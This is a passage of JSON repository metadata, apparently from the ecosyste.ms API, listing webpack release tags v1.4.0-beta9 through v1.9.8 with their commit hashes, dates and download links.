,{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/